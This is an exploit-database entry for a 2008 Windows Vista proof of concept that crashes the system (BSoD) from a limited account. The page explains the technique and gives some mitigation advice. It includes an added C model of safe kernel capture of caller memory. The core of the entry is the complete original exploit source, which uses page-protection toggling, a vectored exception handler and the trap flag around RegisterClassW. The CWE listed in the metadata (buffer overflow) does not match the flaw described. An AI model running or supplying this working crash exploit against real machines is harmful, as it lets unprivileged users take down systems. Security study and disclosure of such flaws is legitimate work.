Vendor: Windows Vista
By: Defsanguje
CVSS: 7.2 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Windows Vista
Affected Version From: Windows Vista Home Premium & Ultimate
Affected Version To: Windows Vista Home Premium & Ultimate
Patch Exists: No
Related CWE: N/A
CPE: o:microsoft:windows_vista
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Year: 2008

Windows Vista BSoD (Access violation) from limited account.

This proof of concept causes a denial of service (a system crash, the BSoD of the title) on Windows Vista and can be run from a limited, non-administrator account. The program installs a vectored exception handler, marks the page holding its window-class name string PAGE_NOACCESS, and then passes that string to RegisterClassW. Each user-mode read of the string raises an access violation, which the handler absorbs by temporarily restoring access to the page and setting the CPU trap flag, so that a single-step exception fires after exactly one instruction and the handler can mark the page PAGE_NOACCESS again. The class name therefore reads correctly from user mode while remaining inaccessible at every other moment; a later access to the inaccessible page from kernel mode is not handled and the machine crashes with an access violation.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all users have the least privileges necessary to perform their tasks. This will limit the damage that can be done if an attacker is able to exploit this vulnerability. Note, however, that the proof of concept already runs from a limited account, so reducing account privileges does not by itself prevent the crash; with no vendor patch listed, the practical controls are restricting who can execute arbitrary code on affected hosts and retiring the unsupported operating system.
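The defensive lesson of this entry concerns how kernel code handles caller-supplied memory: a buffer that was readable a moment ago may be inaccessible by the time the kernel touches it, so the kernel must read it inside an exception guard, copy it once into its own storage under a hard length cap, and validate only that copy. The following is an added, user-space C model of that capture-once pattern; it is not code from the Exploit-DB entry or from Microsoft. The `user_page` struct, `fetch_user_char`, the `DEMO_*` status codes and `MAX_CLASSNAME` are constructed for the illustration: the `accessible` flag stands in for the page protection that the proof of concept toggles, and the "guard" stands in for the probe-and-try/except discipline a real kernel uses.

```c
/* Added illustration, not part of the Exploit-DB entry: a user-space model of the
 * capture-once pattern kernel code should use for caller-supplied strings.
 * user_page, fetch_user_char, the DEMO_* statuses and MAX_CLASSNAME are all
 * constructed for this demo; none are Windows APIs. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MAX_CLASSNAME 256   /* demo cap on class-name length, chosen for the example */

typedef enum {
    DEMO_OK = 0,
    DEMO_INVALID_PARAMETER,     /* caller data rejected, nothing further touched */
    DEMO_ACCESS_FAULT_HANDLED,  /* inaccessible memory hit inside the guard: error returned */
    DEMO_UNHANDLED_FAULT        /* inaccessible memory hit outside any guard: the crash case */
} demo_status;

/* Model of the caller's page: its contents and whether it is accessible right now.
 * 'accessible' stands in for the PAGE_READWRITE / PAGE_NOACCESS state the PoC
 * toggles; reads_seen counts every read the consumer makes of caller memory. */
typedef struct {
    const uint16_t *chars;
    size_t          count;       /* characters present in the mapped region */
    bool            accessible;
    size_t          reads_seen;
} user_page;

/* One read from caller memory; false means the access would fault. */
static bool fetch_user_char(user_page *pg, size_t idx, uint16_t *out)
{
    pg->reads_seen++;
    if (!pg->accessible || idx >= pg->count)
        return false;
    *out = pg->chars[idx];
    return true;
}

/* Naive consumer: no length cap, no guard, two passes over caller memory
 * (measure, then copy). Any fault is unhandled. */
demo_status naive_consume(user_page *pg, uint16_t *dst, size_t dst_cap)
{
    size_t len = 0;
    uint16_t c;
    for (;;) {                                   /* pass 1: find the terminator */
        if (!fetch_user_char(pg, len, &c)) return DEMO_UNHANDLED_FAULT;
        if (c == 0) break;
        len++;
    }
    if (len + 1 > dst_cap) return DEMO_INVALID_PARAMETER;
    for (size_t i = 0; i <= len; i++)            /* pass 2: copy, re-reading caller memory */
        if (!fetch_user_char(pg, i, &dst[i])) return DEMO_UNHANDLED_FAULT;
    return DEMO_OK;
}

/* Hardened consumer: one bounded pass copies at most MAX_CLASSNAME characters into
 * private storage; a fault during that pass becomes a status code, and all later
 * checks look only at the copy, which the caller cannot change. */
demo_status guarded_consume(user_page *pg, uint16_t *dst, size_t dst_cap)
{
    if (dst_cap < MAX_CLASSNAME + 1) return DEMO_INVALID_PARAMETER;
    size_t i;
    for (i = 0; i <= MAX_CLASSNAME; i++) {       /* guarded, bounded capture */
        if (!fetch_user_char(pg, i, &dst[i])) return DEMO_ACCESS_FAULT_HANDLED;
        if (dst[i] == 0) break;
    }
    if (i > MAX_CLASSNAME) { dst[0] = 0; return DEMO_INVALID_PARAMETER; } /* no terminator in cap */
    for (size_t k = 0; k < i; k++)               /* validate the private copy only */
        if (dst[k] < 0x20) { dst[0] = 0; return DEMO_INVALID_PARAMETER; }
    return DEMO_OK;
}

static const uint16_t SAMPLE_NAME[] = { 'B','S','O','D','C','l','a','s','s', 0 }; /* constructed */

/* Runs one consumer against a constructed page and reports the status plus the
 * number of caller-memory reads. terminated=false models a class name that runs
 * to the end of its mapped region without a terminator. */
demo_status run_scenario(bool guarded, bool accessible, bool terminated, size_t *reads_out)
{
    static uint16_t unterminated[MAX_CLASSNAME + 64];
    uint16_t dst[MAX_CLASSNAME + 1];
    user_page pg = { SAMPLE_NAME, sizeof SAMPLE_NAME / sizeof SAMPLE_NAME[0], accessible, 0 };

    if (!terminated) {
        for (size_t i = 0; i < sizeof unterminated / sizeof unterminated[0]; i++) unterminated[i] = 'A';
        pg.chars = unterminated;
        pg.count = sizeof unterminated / sizeof unterminated[0];
    }
    demo_status st = guarded ? guarded_consume(&pg, dst, MAX_CLASSNAME + 1)
                             : naive_consume(&pg, dst, MAX_CLASSNAME + 1);
    if (reads_out) *reads_out = pg.reads_seen;
    return st;
}

int main(void)
{
    size_t r;
    demo_status st;
    st = run_scenario(false, false, true, &r); printf("naive,   inaccessible: status %d\n", st);
    st = run_scenario(true,  false, true, &r); printf("guarded, inaccessible: status %d\n", st);
    st = run_scenario(false, true, false, &r); printf("naive,   unterminated: status %d, %zu reads\n", st, r);
    st = run_scenario(true,  true, false, &r); printf("guarded, unterminated: status %d, %zu reads\n", st, r);
    return 0;
}
```

Against an accessible, terminated name both consumers succeed; against a page that has become inaccessible the naive consumer's fault is unhandled (the crash case) while the guarded consumer returns an error; and against an unterminated name the naive consumer walks off the end of the mapped region, whereas the guarded one stops after MAX_CLASSNAME + 1 reads and rejects the input.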

Exploit-DB raw data:

// //////////////////////////////////////////////////////////////
// Windows Vista BSoD (Access violation) from limited account. //
// Tested on Home Premium & Ultimate @ October 05 2008         //
/////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>

// Class-name buffer; the whole page holding it is later marked PAGE_NOACCESS.
WCHAR szClass[] = L"BSODClass";

// A vectored handler has the signature LONG CALLBACK (EXCEPTION_POINTERS*).
LONG CALLBACK ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo);

// RtlAddVectoredExceptionHandler(First, Handler) returns a handle (PVOID), not void.
typedef PVOID (NTAPI* pFunc)(ULONG ulFirst, PVECTORED_EXCEPTION_HANDLER lpHandler);
pFunc pRtlAddVectoredExceptionHandler;

// Layout of EXCEPTION_RECORD.ExceptionInformation for an access violation:
// [0] = 0 for a read, 1 for a write; [1] = faulting virtual address (both ULONG_PTR).
typedef struct
{
    ULONG_PTR dwWriteViolation;
    ULONG_PTR lpAddress;
} EXCEPTION_ACCESS_VIOLATION_PARAMS;

int main(void)
{
    WNDCLASSW wc;
    DWORD dwOldProt;

    printf("Windows Vista BSoD from usermode/limited account.\n"
           "Coded by. Defsanguje - October 05 2008\n");

    // Setup vectored exception handler. SEH would work also.
    pRtlAddVectoredExceptionHandler = (pFunc)GetProcAddress(GetModuleHandleA("ntdll.dll"),
                                                            "RtlAddVectoredExceptionHandler");
    if (pRtlAddVectoredExceptionHandler == NULL)
    {
        printf("RtlAddVectoredExceptionHandler not found\n");
        return 1;
    }
    (*pRtlAddVectoredExceptionHandler)(TRUE, ExceptionHandler);

    // Dummy data
    wc.style         = 0;
    wc.lpfnWndProc   = NULL;
    wc.cbClsExtra    = 0;
    wc.cbWndExtra    = 0;
    wc.hInstance     = GetModuleHandle(NULL);
    wc.hIcon         = NULL;
    wc.hCursor       = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = (HBRUSH)GetStockObject(HOLLOW_BRUSH);
    wc.lpszMenuName  = NULL;
    wc.lpszClassName = szClass;

    // Make the page holding szClass inaccessible, then hand the class name to
    // RegisterClassW. Every user-mode read of it faults into ExceptionHandler,
    // which restores access for exactly one instruction at a time.
    VirtualProtect(szClass, 1, PAGE_NOACCESS, &dwOldProt);
    RegisterClassW(&wc);

    printf("You shouldn't see this");
    return 0;
}

LONG CALLBACK ExceptionHandler(EXCEPTION_POINTERS* lpExceptionInfo)
{
    static LPVOID lpLastAddress;
    static DWORD dwOldProt;
    EXCEPTION_ACCESS_VIOLATION_PARAMS* avParams;

    switch(lpExceptionInfo->ExceptionRecord->ExceptionCode)
    {
        case EXCEPTION_ACCESS_VIOLATION:
            // Re-enable access to the faulting page so the instruction can be retried.
            avParams = (EXCEPTION_ACCESS_VIOLATION_PARAMS*)lpExceptionInfo->ExceptionRecord->ExceptionInformation;
            lpLastAddress = (LPVOID)avParams->lpAddress;
            VirtualProtect(lpLastAddress, 1, PAGE_READWRITE, &dwOldProt);

            // Set trap flag (EFLAGS.TF) so a single-step exception fires right after
            // that one instruction completes.
            lpExceptionInfo->ContextRecord->EFlags |= 0x100;
            return EXCEPTION_CONTINUE_EXECUTION;

        case EXCEPTION_SINGLE_STEP:
            // Re-protect the page immediately after the single retried instruction.
            VirtualProtect(lpLastAddress, 1, PAGE_NOACCESS, &dwOldProt);
            return EXCEPTION_CONTINUE_EXECUTION;

        default:
            // Not ours: let the remaining handlers / SEH chain deal with it.
            return EXCEPTION_CONTINUE_SEARCH;
    }
}

// milw0rm.com [2008-10-04]